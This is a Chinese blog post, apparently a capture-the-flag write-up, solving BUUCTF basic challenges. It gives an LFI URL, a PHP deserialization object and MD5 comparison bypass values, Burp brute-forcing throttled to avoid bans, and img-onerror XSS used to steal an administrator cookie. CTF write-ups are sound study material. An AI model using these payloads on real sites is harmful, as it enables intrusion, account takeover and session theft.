首页 > 其他 > 详细

BUUCTF Basic

时间:2021-06-13 23:56:52      阅读:131      评论:0      收藏:0      [点我收藏+]

BUUCTF Basic

1.Linux Labs(ssh连内外服务器)

技术分享图片

-p: 指定端口,root: 用户名, @后接ip地址 需要知道密码

技术分享图片

2.BUU LFI COURSE 1(文件包含)

技术分享图片

url/?file= 后面多尝试几次, 用到../ ,/等。

http://d7e2db65-10f1-43ac-9d11-5926b92612a8.node3.buuoj.cn/?file=/flag

3.Upload-Labs

4.BUU CODE REVIEW

class BUU {
   public $correct = "";
   public $input = "";

   public function __destruct() {
       try {
           $this->correct = base64_encode(uniqid()); //uniqid() 函数基于以微秒计的当前时间,生成一个唯一的 ID.然后进行base64编码
           if($this->correct === $this->input) {   
               echo file_get_contents("/flag");
           }
       } catch (Exception $e) {
       }
   }
}

if($_GET[‘pleaseget‘] === ‘1‘) {
    if($_POST[‘pleasepost‘] === ‘2‘) {
        if(md5($_POST[‘md51‘]) == md5($_POST[‘md52‘]) && $_POST[‘md51‘] != $_POST[‘md52‘]) {
            unserialize($_POST[‘obj‘]);    //对boj对象进行反序列化
        }
    }
  1. 写一个php脚本来序列化对象:

    <?php
    class BUU {
       public $correct = "";
       public $input = "";
                   }
    $a = new BUU();
    $a->input=&$a->correct;   //传引用
    $a = serialize($a);
    echo $a;
    ?>
    

    得到:

    O:3:"BUU":2:{s:7:"correct";s:0:"";s:5:"input";R:2;}
    
  2. MD5绕过

    md5(md51) == md5(md52) && md51!= md52
    

    用这两种绕过:

    • md51=QNKCDZO&md52=240610708

    • md51[]=1&md52=2

payload:

技术分享图片

5.BUU BRUTE (爆破,设置延时绕过防护)

用户名一般写为admin,密码随便输入提交后提示为4位数字。

BurpSuite爆破,修改payload位置为password那个位置(即$$包住的位置)

技术分享图片

修改Intruder间隔时间,速度慢一点,防止被封。(耐心等待)

技术分享图片

技术分享图片

BUU XSS COURSE

  1. 吐槽,树洞里:
<script>alert(‘aaa‘)</script>

提交后访问提示给的地址,没有弹窗。

换个标签:

<IMG SRC=‘dfdfdf‘ onerror="alert(‘abc‘);">

提交后访问提示给的地址,成功弹窗。

技术分享图片

img标签可以使用。

  1. 在内网xss平台xss.buuoj.cn上,创建新项目,把img标签的脚本段复制到输入框,然后得到管理员cookie,管理员地址。
  2. 用editthiscookies修改成管理员cookie,登录管理员网站,得到flag。

技术分享图片

BUUCTF Basic

原文:https://www.cnblogs.com/jingvf/p/14881417.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!